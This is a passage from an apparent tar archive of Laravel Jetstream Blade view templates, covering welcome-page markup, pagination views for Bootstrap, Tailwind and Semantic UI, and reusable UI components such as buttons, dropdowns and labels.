0l-6.75-6.75M19.5 12l-6.75 6.75" /> </svg> </a> <div class="scale-100 p-6 bg-white from-gray-700/50 via-transparent rounded-lg shadow-2xl shadow-gray-500/20 flex motion-safe:hover:scale-[1.01] transition-all duration-250 focus:outline focus:outline-2 focus:outline-red-500"> <div> <div class="h-16 w-16 bg-red-50 flex items-center justify-center rounded-full"> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="w-7 h-7 stroke-red-500"> <path stroke-linecap="round" stroke-linejoin="round" d="M6.115 5.19l.319 1.913A6 6 0 008.11 10.36L9.75 12l-.387.775c-.217.433-.132.956.21 1.298l1.348 1.348c.21.21.329.497.329.795v1.089c0 .426.24.815.622 1.006l.153.076c.433.217.956.132 1.298-.21l.723-.723a8.7 8.7 0 002.288-4.042 1.087 1.087 0 00-.358-1.099l-1.33-1.108c-.251-.21-.582-.299-.905-.245l-1.17.195a1.125 1.125 0 01-.98-.314l-.295-.295a1.125 1.125 0 010-1.591l.13-.132a1.125 1.125 0 011.3-.21l.603.302a.809.809 0 001.086-1.086L14.25 7.5l1.256-.837a4.5 4.5 0 001.528-1.732l.146-.292M6.115 5.19A9 9 0 1017.18 4.64M6.115 5.19A8.965 8.965 0 0112 3c1.929 0 3.716.607 5.18 1.64" /> </svg> </div> <h2 class="mt-6 text-xl font-semibold text-gray-900">Vibrant Ecosystem</h2> <p class="mt-4 text-gray-500 text-sm leading-relaxed"> Laravel's robust library of first-party tools and libraries, such as <a href="https://forge.laravel.com" class="underline hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Forge</a>, <a href="https://vapor.laravel.com" class="underline hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Vapor</a>, <a href="https://nova.laravel.com" class="underline hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Nova</a>, and <a href="https://envoyer.io" class="underline hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Envoyer</a> help you take your projects to the next level. Pair them with powerful open source libraries like <a href="https://laravel.com/docs/billing" class="underline hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Cashier</a>, <a href="https://laravel.com/docs/dusk" class="underline hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Dusk</a>, <a href="https://laravel.com/docs/broadcasting" class="underline hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Echo</a>, <a href="https://laravel.com/docs/horizon" class="underline hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Horizon</a>, <a href="https://laravel.com/docs/sanctum" class="underline hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Sanctum</a>, <a href="https://laravel.com/docs/telescope" class="underline hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Telescope</a>, and more. </p> </div> </div> </div> </div> <div class="flex justify-center mt-16 px-0 sm:items-center sm:justify-between"> <div class="text-center text-sm text-gray-500 sm:text-left"> <div class="flex items-center gap-4"> <a href="https://github.com/sponsors/taylorotwell" class="group inline-flex items-center hover:text-gray-700 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500"> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="-mt-px mr-1 w-5 h-5 stroke-gray-400 group-hover:stroke-gray-600"> <path stroke-linecap="round" stroke-linejoin="round" d="M21 8.25c0-2.485-2.099-4.5-4.688-4.5-1.935 0-3.597 1.126-4.312 2.733-.715-1.607-2.377-2.733-4.313-2.733C5.1 3.75 3 5.765 3 8.25c0 7.22 9 12 9 12s9-4.78 9-12z" /> </svg> Sponsor </a> </div> </div> <div class="ml-4 text-center text-sm text-gray-500 sm:text-right sm:ml-0"> Laravel v{{ Illuminate\Foundation\Application::VERSION }} (PHP v{{ PHP_VERSION }}) </div> </div> </div> </div> </body> </html> ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/vendor/pagination/bootstrap-5.blade.php�������������������������������������������������������0000644�����������������00000011417�14765366572�0015316 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($paginator->hasPages()) <nav class="d-flex justify-items-center justify-content-between"> <div class="d-flex justify-content-between flex-fill d-sm-none"> <ul class="pagination"> {{-- Previous Page Link --}} @if ($paginator->onFirstPage()) <li class="page-item disabled" aria-disabled="true"> <span class="page-link">@lang('pagination.previous')</span> </li> @else <li class="page-item"> <a class="page-link" href="{{ $paginator->previousPageUrl() }}" rel="prev">@lang('pagination.previous')</a> </li> @endif {{-- Next Page Link --}} @if ($paginator->hasMorePages()) <li class="page-item"> <a class="page-link" href="{{ $paginator->nextPageUrl() }}" rel="next">@lang('pagination.next')</a> </li> @else <li class="page-item disabled" aria-disabled="true"> <span class="page-link">@lang('pagination.next')</span> </li> @endif </ul> </div> <div class="d-none flex-sm-fill d-sm-flex align-items-sm-center justify-content-sm-between"> <div> <ul class="pagination"> {{-- Previous Page Link --}} @if ($paginator->onFirstPage()) <li class="page-item disabled" aria-disabled="true" aria-label="@lang('pagination.previous')"> <span class="page-link" aria-hidden="true">‹</span> </li> @else <li class="page-item"> <a class="page-link" href="{{ $paginator->previousPageUrl() }}" rel="prev" aria-label="@lang('pagination.previous')">‹</a> </li> @endif {{-- Pagination Elements --}} @foreach ($elements as $element) {{-- "Three Dots" Separator --}} @if (is_string($element)) <li class="page-item disabled" aria-disabled="true"><span class="page-link">{{ $element }}</span></li> @endif {{-- Array Of Links --}} @if (is_array($element)) @foreach ($element as $page => $url) <!-- Use three dots when current page is greater than 4. --> @if ($page == $paginator->currentPage() > 4 && $page === 2) <li class="page-item disabled"><span class="page-link">...</span></li> @endif <!-- Show active page else show the first and last two pages from current page. --> @if ($page == $paginator->currentPage()) <li class="page-item active"><span class="page-link">{{ $page }}</span></li> @elseif ($page === $paginator->currentPage() + 1 || $page === $paginator->currentPage() + 2 || $page === $paginator->currentPage() - 1 || $page === $paginator->currentPage() - 2 || $page === $paginator->lastPage() || $page === 1) <li class="page-item"><a class="page-link" href="{{ $url }}">{{ $page }}</a></li> @endif <!-- Use three dots when current page is away from end. --> @if ($page == $paginator->currentPage() < $paginator->lastPage() - 3 && $page === $paginator->lastPage() - 1) <li class="page-item disabled"><span class="page-link">...</span></li> @endif @endforeach @endif @endforeach {{-- Next Page Link --}} @if ($paginator->hasMorePages()) <li class="page-item"> <a class="page-link" href="{{ $paginator->nextPageUrl() }}" rel="next" aria-label="@lang('pagination.next')">›</a> </li> @else <li class="page-item disabled" aria-disabled="true" aria-label="@lang('pagination.next')"> <span class="page-link" aria-hidden="true">›</span> </li> @endif </ul> </div> </div> </nav> @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/vendor/pagination/simple-bootstrap-5.blade.php������������������������������������������������0000644�����������������00000002224�14765366572�0016601 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($paginator->hasPages()) <nav role="navigation" aria-label="Pagination Navigation"> <ul class="pagination"> {{-- Previous Page Link --}} @if ($paginator->onFirstPage()) <li class="page-item disabled" aria-disabled="true"> <span class="page-link">{!! __('pagination.previous') !!}</span> </li> @else <li class="page-item"> <a class="page-link" href="{{ $paginator->previousPageUrl() }}" rel="prev"> {!! __('pagination.previous') !!} </a> </li> @endif {{-- Next Page Link --}} @if ($paginator->hasMorePages()) <li class="page-item"> <a class="page-link" href="{{ $paginator->nextPageUrl() }}" rel="next">{!! __('pagination.next') !!}</a> </li> @else <li class="page-item disabled" aria-disabled="true"> <span class="page-link">{!! __('pagination.next') !!}</span> </li> @endif </ul> </nav> @endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/vendor/pagination/bootstrap-4.blade.php�������������������������������������������������������0000644�����������������00000004044�14765366572�0015313 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($paginator->hasPages()) <nav> <ul class="pagination"> {{-- Previous Page Link --}} @if ($paginator->onFirstPage()) <li class="page-item disabled" aria-disabled="true" aria-label="@lang('pagination.previous')"> <span class="page-link" aria-hidden="true">‹</span> </li> @else <li class="page-item"> <a class="page-link" href="{{ $paginator->previousPageUrl() }}" rel="prev" aria-label="@lang('pagination.previous')">‹</a> </li> @endif {{-- Pagination Elements --}} @foreach ($elements as $element) {{-- "Three Dots" Separator --}} @if (is_string($element)) <li class="page-item disabled" aria-disabled="true"><span class="page-link">{{ $element }}</span></li> @endif {{-- Array Of Links --}} @if (is_array($element)) @foreach ($element as $page => $url) @if ($page == $paginator->currentPage()) <li class="page-item active" aria-current="page"><span class="page-link">{{ $page }}</span></li> @else <li class="page-item"><a class="page-link" href="{{ $url }}">{{ $page }}</a></li> @endif @endforeach @endif @endforeach {{-- Next Page Link --}} @if ($paginator->hasMorePages()) <li class="page-item"> <a class="page-link" href="{{ $paginator->nextPageUrl() }}" rel="next" aria-label="@lang('pagination.next')">›</a> </li> @else <li class="page-item disabled" aria-disabled="true" aria-label="@lang('pagination.next')"> <span class="page-link" aria-hidden="true">›</span> </li> @endif </ul> </nav> @endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/vendor/pagination/simple-default.blade.php����������������������������������������������������0000644�����������������00000001405�14765366572�0016046 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($paginator->hasPages()) <nav> <ul class="pagination"> {{-- Previous Page Link --}} @if ($paginator->onFirstPage()) <li class="disabled" aria-disabled="true"><span>@lang('pagination.previous')</span></li> @else <li><a href="{{ $paginator->previousPageUrl() }}" rel="prev">@lang('pagination.previous')</a></li> @endif {{-- Next Page Link --}} @if ($paginator->hasMorePages()) <li><a href="{{ $paginator->nextPageUrl() }}" rel="next">@lang('pagination.next')</a></li> @else <li class="disabled" aria-disabled="true"><span>@lang('pagination.next')</span></li> @endif </ul> </nav> @endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/vendor/pagination/semantic-ui.blade.php�������������������������������������������������������0000644�����������������00000003222�14765366572�0015350 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($paginator->hasPages()) <div class="ui pagination menu" role="navigation"> {{-- Previous Page Link --}} @if ($paginator->onFirstPage()) <a class="icon item disabled" aria-disabled="true" aria-label="@lang('pagination.previous')"> <i class="left chevron icon"></i> </a> @else <a class="icon item" href="{{ $paginator->previousPageUrl() }}" rel="prev" aria-label="@lang('pagination.previous')"> <i class="left chevron icon"></i> </a> @endif {{-- Pagination Elements --}} @foreach ($elements as $element) {{-- "Three Dots" Separator --}} @if (is_string($element)) <a class="icon item disabled" aria-disabled="true">{{ $element }}</a> @endif {{-- Array Of Links --}} @if (is_array($element)) @foreach ($element as $page => $url) @if ($page == $paginator->currentPage()) <a class="item active" href="{{ $url }}" aria-current="page">{{ $page }}</a> @else <a class="item" href="{{ $url }}">{{ $page }}</a> @endif @endforeach @endif @endforeach {{-- Next Page Link --}} @if ($paginator->hasMorePages()) <a class="icon item" href="{{ $paginator->nextPageUrl() }}" rel="next" aria-label="@lang('pagination.next')"> <i class="right chevron icon"></i> </a> @else <a class="icon item disabled" aria-disabled="true" aria-label="@lang('pagination.next')"> <i class="right chevron icon"></i> </a> @endif </div> @endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/vendor/pagination/simple-tailwind.blade.php���������������������������������������������������0000644�����������������00000003243�14765366572�0016237 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($paginator->hasPages()) <nav role="navigation" aria-label="Pagination Navigation" class="flex justify-between"> {{-- Previous Page Link --}} @if ($paginator->onFirstPage()) <span class="relative inline-flex items-center px-4 py-2 text-sm font-medium text-gray-500 bg-white border border-gray-300 cursor-default leading-5 rounded-md"> {!! __('pagination.previous') !!} </span> @else <a href="{{ $paginator->previousPageUrl() }}" rel="prev" class="relative inline-flex items-center px-4 py-2 text-sm font-medium text-gray-700 bg-white border border-gray-300 leading-5 rounded-md hover:text-gray-500 focus:outline-none focus:ring ring-gray-300 focus:border-blue-300 active:bg-gray-100 active:text-gray-700 transition ease-in-out duration-150"> {!! __('pagination.previous') !!} </a> @endif {{-- Next Page Link --}} @if ($paginator->hasMorePages()) <a href="{{ $paginator->nextPageUrl() }}" rel="next" class="relative inline-flex items-center px-4 py-2 text-sm font-medium text-gray-700 bg-white border border-gray-300 leading-5 rounded-md hover:text-gray-500 focus:outline-none focus:ring ring-gray-300 focus:border-blue-300 active:bg-gray-100 active:text-gray-700 transition ease-in-out duration-150"> {!! __('pagination.next') !!} </a> @else <span class="relative inline-flex items-center px-4 py-2 text-sm font-medium text-gray-500 bg-white border border-gray-300 cursor-default leading-5 rounded-md"> {!! __('pagination.next') !!} </span> @endif </nav> @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/vendor/pagination/tailwind.blade.php����������������������������������������������������������0000644�����������������00000017232�14765366572�0014753 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($paginator->hasPages()) <nav role="navigation" aria-label="{{ __('Pagination Navigation') }}" class="flex items-center justify-between"> <div class="flex justify-between flex-1 sm:hidden"> @if ($paginator->onFirstPage()) <span class="relative inline-flex items-center px-4 py-2 text-sm font-medium text-gray-500 bg-white border border-gray-300 cursor-default leading-5 rounded-md"> {!! __('pagination.previous') !!} </span> @else <a href="{{ $paginator->previousPageUrl() }}" class="relative inline-flex items-center px-4 py-2 text-sm font-medium text-gray-700 bg-white border border-gray-300 leading-5 rounded-md hover:text-gray-500 focus:outline-none focus:ring ring-gray-300 focus:border-blue-300 active:bg-gray-100 active:text-gray-700 transition ease-in-out duration-150"> {!! __('pagination.previous') !!} </a> @endif @if ($paginator->hasMorePages()) <a href="{{ $paginator->nextPageUrl() }}" class="relative inline-flex items-center px-4 py-2 ml-3 text-sm font-medium text-gray-700 bg-white border border-gray-300 leading-5 rounded-md hover:text-gray-500 focus:outline-none focus:ring ring-gray-300 focus:border-blue-300 active:bg-gray-100 active:text-gray-700 transition ease-in-out duration-150"> {!! __('pagination.next') !!} </a> @else <span class="relative inline-flex items-center px-4 py-2 ml-3 text-sm font-medium text-gray-500 bg-white border border-gray-300 cursor-default leading-5 rounded-md"> {!! __('pagination.next') !!} </span> @endif </div> <div class="hidden sm:flex-1 sm:flex sm:items-center sm:justify-between"> <div> <p class="text-sm text-gray-700 leading-5"> {!! __('Showing') !!} @if ($paginator->firstItem()) <span class="font-medium">{{ $paginator->firstItem() }}</span> {!! __('to') !!} <span class="font-medium">{{ $paginator->lastItem() }}</span> @else {{ $paginator->count() }} @endif {!! __('of') !!} <span class="font-medium">{{ $paginator->total() }}</span> {!! __('results') !!} </p> </div> <div> <span class="relative z-0 inline-flex shadow-sm rounded-md"> {{-- Previous Page Link --}} @if ($paginator->onFirstPage()) <span aria-disabled="true" aria-label="{{ __('pagination.previous') }}"> <span class="relative inline-flex items-center px-2 py-2 text-sm font-medium text-gray-500 bg-white border border-gray-300 cursor-default rounded-l-md leading-5" aria-hidden="true"> <svg class="w-5 h-5" fill="currentColor" viewBox="0 0 20 20"> <path fill-rule="evenodd" d="M12.707 5.293a1 1 0 010 1.414L9.414 10l3.293 3.293a1 1 0 01-1.414 1.414l-4-4a1 1 0 010-1.414l4-4a1 1 0 011.414 0z" clip-rule="evenodd" /> </svg> </span> </span> @else <a href="{{ $paginator->previousPageUrl() }}" rel="prev" class="relative inline-flex items-center px-2 py-2 text-sm font-medium text-gray-500 bg-white border border-gray-300 rounded-l-md leading-5 hover:text-gray-400 focus:z-10 focus:outline-none focus:ring ring-gray-300 focus:border-blue-300 active:bg-gray-100 active:text-gray-500 transition ease-in-out duration-150" aria-label="{{ __('pagination.previous') }}"> <svg class="w-5 h-5" fill="currentColor" viewBox="0 0 20 20"> <path fill-rule="evenodd" d="M12.707 5.293a1 1 0 010 1.414L9.414 10l3.293 3.293a1 1 0 01-1.414 1.414l-4-4a1 1 0 010-1.414l4-4a1 1 0 011.414 0z" clip-rule="evenodd" /> </svg> </a> @endif {{-- Pagination Elements --}} @foreach ($elements as $element) {{-- "Three Dots" Separator --}} @if (is_string($element)) <span aria-disabled="true"> <span class="relative inline-flex items-center px-4 py-2 -ml-px text-sm font-medium text-gray-700 bg-white border border-gray-300 cursor-default leading-5">{{ $element }}</span> </span> @endif {{-- Array Of Links --}} @if (is_array($element)) @foreach ($element as $page => $url) @if ($page == $paginator->currentPage()) <span aria-current="page"> <span class="relative inline-flex items-center px-4 py-2 -ml-px text-sm font-medium text-gray-500 bg-white border border-gray-300 cursor-default leading-5">{{ $page }}</span> </span> @else <a href="{{ $url }}" class="relative inline-flex items-center px-4 py-2 -ml-px text-sm font-medium text-gray-700 bg-white border border-gray-300 leading-5 hover:text-gray-500 focus:z-10 focus:outline-none focus:ring ring-gray-300 focus:border-blue-300 active:bg-gray-100 active:text-gray-700 transition ease-in-out duration-150" aria-label="{{ __('Go to page :page', ['page' => $page]) }}"> {{ $page }} </a> @endif @endforeach @endif @endforeach {{-- Next Page Link --}} @if ($paginator->hasMorePages()) <a href="{{ $paginator->nextPageUrl() }}" rel="next" class="relative inline-flex items-center px-2 py-2 -ml-px text-sm font-medium text-gray-500 bg-white border border-gray-300 rounded-r-md leading-5 hover:text-gray-400 focus:z-10 focus:outline-none focus:ring ring-gray-300 focus:border-blue-300 active:bg-gray-100 active:text-gray-500 transition ease-in-out duration-150" aria-label="{{ __('pagination.next') }}"> <svg class="w-5 h-5" fill="currentColor" viewBox="0 0 20 20"> <path fill-rule="evenodd" d="M7.293 14.707a1 1 0 010-1.414L10.586 10 7.293 6.707a1 1 0 011.414-1.414l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414 0z" clip-rule="evenodd" /> </svg> </a> @else <span aria-disabled="true" aria-label="{{ __('pagination.next') }}"> <span class="relative inline-flex items-center px-2 py-2 -ml-px text-sm font-medium text-gray-500 bg-white border border-gray-300 cursor-default rounded-r-md leading-5" aria-hidden="true"> <svg class="w-5 h-5" fill="currentColor" viewBox="0 0 20 20"> <path fill-rule="evenodd" d="M7.293 14.707a1 1 0 010-1.414L10.586 10 7.293 6.707a1 1 0 011.414-1.414l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414 0z" clip-rule="evenodd" /> </svg> </span> </span> @endif </span> </div> </div> </nav> @endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/vendor/pagination/simple-bootstrap-4.blade.php������������������������������������������������0000644�����������������00000002035�14765366572�0016600 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($paginator->hasPages()) <nav> <ul class="pagination"> {{-- Previous Page Link --}} @if ($paginator->onFirstPage()) <li class="page-item disabled" aria-disabled="true"> <span class="page-link">@lang('pagination.previous')</span> </li> @else <li class="page-item"> <a class="page-link" href="{{ $paginator->previousPageUrl() }}" rel="prev">@lang('pagination.previous')</a> </li> @endif {{-- Next Page Link --}} @if ($paginator->hasMorePages()) <li class="page-item"> <a class="page-link" href="{{ $paginator->nextPageUrl() }}" rel="next">@lang('pagination.next')</a> </li> @else <li class="page-item disabled" aria-disabled="true"> <span class="page-link">@lang('pagination.next')</span> </li> @endif </ul> </nav> @endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/vendor/pagination/default.blade.php�����������������������������������������������������������0000644�����������������00000003510�14765366572�0014556 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($paginator->hasPages()) <nav> <ul class="pagination"> {{-- Previous Page Link --}} @if ($paginator->onFirstPage()) <li class="disabled" aria-disabled="true" aria-label="@lang('pagination.previous')"> <span aria-hidden="true">‹</span> </li> @else <li> <a href="{{ $paginator->previousPageUrl() }}" rel="prev" aria-label="@lang('pagination.previous')">‹</a> </li> @endif {{-- Pagination Elements --}} @foreach ($elements as $element) {{-- "Three Dots" Separator --}} @if (is_string($element)) <li class="disabled" aria-disabled="true"><span>{{ $element }}</span></li> @endif {{-- Array Of Links --}} @if (is_array($element)) @foreach ($element as $page => $url) @if ($page == $paginator->currentPage()) <li class="active" aria-current="page"><span>{{ $page }}</span></li> @else <li><a href="{{ $url }}">{{ $page }}</a></li> @endif @endforeach @endif @endforeach {{-- Next Page Link --}} @if ($paginator->hasMorePages()) <li> <a href="{{ $paginator->nextPageUrl() }}" rel="next" aria-label="@lang('pagination.next')">›</a> </li> @else <li class="disabled" aria-disabled="true" aria-label="@lang('pagination.next')"> <span aria-hidden="true">›</span> </li> @endif </ul> </nav> @endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/authentication-card-logo.blade.php�������������������������������������������������0000644�����������������00000000722�14765366572�0016557 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<a href="/"> <svg class="w-16 h-16" viewbox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.395 44.428C4.557 40.198 0 32.632 0 24 0 10.745 10.745 0 24 0a23.891 23.891 0 0113.997 4.502c-.2 17.907-11.097 33.245-26.602 39.926z" fill="#6875F5"/> <path d="M14.134 45.885A23.914 23.914 0 0024 48c13.255 0 24-10.745 24-24 0-3.516-.756-6.856-2.115-9.866-4.659 15.143-16.608 27.092-31.75 31.751z" fill="#6875F5"/> </svg> </a> ����������������������������������������������views/components/action-message.blade.php�����������������������������������������������������������0000644�����������������00000000704�14765366572�0014572 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['on']) <div x-data="{ shown: false, timeout: null }" x-init="@this.on('{{ $on }}', () => { clearTimeout(timeout); shown = true; timeout = setTimeout(() => { shown = false }, 2000); })" x-show.transition.out.opacity.duration.1500ms="shown" x-transition:leave.opacity.duration.1500ms style="display: none;" {{ $attributes->merge(['class' => 'text-sm text-gray-600']) }}> {{ $slot->isEmpty() ? 'Saved.' : $slot }} </div> ������������������������������������������������������������views/components/authentication-card.blade.php������������������������������������������������������0000644�����������������00000000426�14765366572�0015622 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div class="min-h-screen flex flex-col sm:justify-center items-center pt-6 sm:pt-0 bg-gray-100"> <div> {{ $logo }} </div> <div class="w-full sm:max-w-md mt-6 px-6 py-4 bg-white shadow-md overflow-hidden sm:rounded-lg"> {{ $slot }} </div> </div> ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/label.blade.php��������������������������������������������������������������������0000644�����������������00000000217�14765366572�0012751 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['value']) <label {{ $attributes->merge(['class' => 'block font-medium text-sm text-gray-700']) }}> {{ $value ?? $slot }} </label> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/dropdown-link.blade.php������������������������������������������������������������0000644�����������������00000000330�14765366572�0014455 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<a {{ $attributes->merge(['class' => 'block w-full px-4 py-2 text-left text-sm leading-5 text-gray-700 hover:bg-gray-100 focus:outline-none focus:bg-gray-100 transition duration-150 ease-in-out']) }}>{{ $slot }}</a> ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/action-section.blade.php�����������������������������������������������������������0000644�����������������00000000635�14765366572�0014615 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div {{ $attributes->merge(['class' => 'md:grid md:grid-cols-3 md:gap-6']) }}> <x-section-title> <x-slot name="title">{{ $title }}</x-slot> <x-slot name="description">{{ $description }}</x-slot> </x-section-title> <div class="mt-5 md:mt-0 md:col-span-2"> <div class="px-4 py-5 sm:p-6 bg-white shadow sm:rounded-lg"> {{ $content }} </div> </div> </div> ���������������������������������������������������������������������������������������������������views/components/danger-button.blade.php������������������������������������������������������������0000644�����������������00000000613�14765366572�0014443 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<button {{ $attributes->merge(['type' => 'button', 'class' => 'inline-flex items-center justify-center px-4 py-2 bg-red-600 border border-transparent rounded-md font-semibold text-xs text-white uppercase tracking-widest hover:bg-red-500 active:bg-red-700 focus:outline-none focus:ring-2 focus:ring-red-500 focus:ring-offset-2 transition ease-in-out duration-150']) }}> {{ $slot }} </button> ���������������������������������������������������������������������������������������������������������������������views/components/dropdown.blade.php�����������������������������������������������������������������0000644�����������������00000002731�14765366572�0013531 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['align' => 'right', 'width' => '48', 'contentClasses' => 'py-1 bg-white', 'dropdownClasses' => '']) @php switch ($align) { case 'left': $alignmentClasses = 'origin-top-left left-0'; break; case 'top': $alignmentClasses = 'origin-top'; break; case 'none': case 'false': $alignmentClasses = ''; break; case 'right': default: $alignmentClasses = 'origin-top-right right-0'; break; } switch ($width) { case '48': $width = 'w-48'; break; } @endphp <div class="relative" x-data="{ open: false }" @click.away="open = false" @close.stop="open = false"> <div @click="open = ! open"> {{ $trigger }} </div> <div x-show="open" x-transition:enter="transition ease-out duration-200" x-transition:enter-start="transform opacity-0 scale-95" x-transition:enter-end="transform opacity-100 scale-100" x-transition:leave="transition ease-in duration-75" x-transition:leave-start="transform opacity-100 scale-100" x-transition:leave-end="transform opacity-0 scale-95" class="absolute z-50 mt-2 {{ $width }} rounded-md shadow-lg {{ $alignmentClasses }} {{ $dropdownClasses }}" style="display: none;" @click="open = false"> <div class="rounded-md ring-1 ring-black ring-opacity-5 {{ $contentClasses }}"> {{ $content }} </div> </div> </div> ���������������������������������������views/components/secondary-button.blade.php���������������������������������������������������������0000644�����������������00000000611�14765366572�0015170 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<button {{ $attributes->merge(['type' => 'button', 'class' => 'inline-flex items-center px-4 py-2 bg-white border border-gray-300 rounded-md font-semibold text-xs text-gray-700 uppercase tracking-widest shadow-sm hover:bg-gray-50 focus:outline-none focus:ring-2 focus:ring-indigo-500 focus:ring-offset-2 disabled:opacity-25 transition ease-in-out duration-150']) }}> {{ $slot }} </button> �����������������������������������������������������������������������������������������������������������������������views/components/welcome.blade.php������������������������������������������������������������������0000644�����������������00000013420�14765366572�0013325 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div class="p-6 lg:p-8 bg-white border-b border-gray-200"> <x-application-logo class="block h-12 w-auto" /> <h1 class="mt-8 text-2xl font-medium text-gray-900"> Welcome to your Jetstream application! </h1> <p class="mt-6 text-gray-500 leading-relaxed"> Laravel Jetstream provides a beautiful, robust starting point for your next Laravel application. Laravel is designed to help you build your application using a development environment that is simple, powerful, and enjoyable. We believe you should love expressing your creativity through programming, so we have spent time carefully crafting the Laravel ecosystem to be a breath of fresh air. We hope you love it. </p> </div> <div class="bg-gray-200 bg-opacity-25 grid grid-cols-1 md:grid-cols-2 gap-6 lg:gap-8 p-6 lg:p-8"> <div> <div class="flex items-center"> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="w-6 h-6 stroke-gray-400"> <path stroke-linecap="round" stroke-linejoin="round" d="M12 6.042A8.967 8.967 0 006 3.75c-1.052 0-2.062.18-3 .512v14.25A8.987 8.987 0 016 18c2.305 0 4.408.867 6 2.292m0-14.25a8.966 8.966 0 016-2.292c1.052 0 2.062.18 3 .512v14.25A8.987 8.987 0 0018 18a8.967 8.967 0 00-6 2.292m0-14.25v14.25" /> </svg> <h2 class="ml-3 text-xl font-semibold text-gray-900"> <a href="https://laravel.com/docs">Documentation</a> </h2> </div> <p class="mt-4 text-gray-500 text-sm leading-relaxed"> Laravel has wonderful documentation covering every aspect of the framework. Whether you're new to the framework or have previous experience, we recommend reading all of the documentation from beginning to end. </p> <p class="mt-4 text-sm"> <a href="https://laravel.com/docs" class="inline-flex items-center font-semibold text-indigo-700"> Explore the documentation <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" class="ml-1 w-5 h-5 fill-indigo-500"> <path fill-rule="evenodd" d="M5 10a.75.75 0 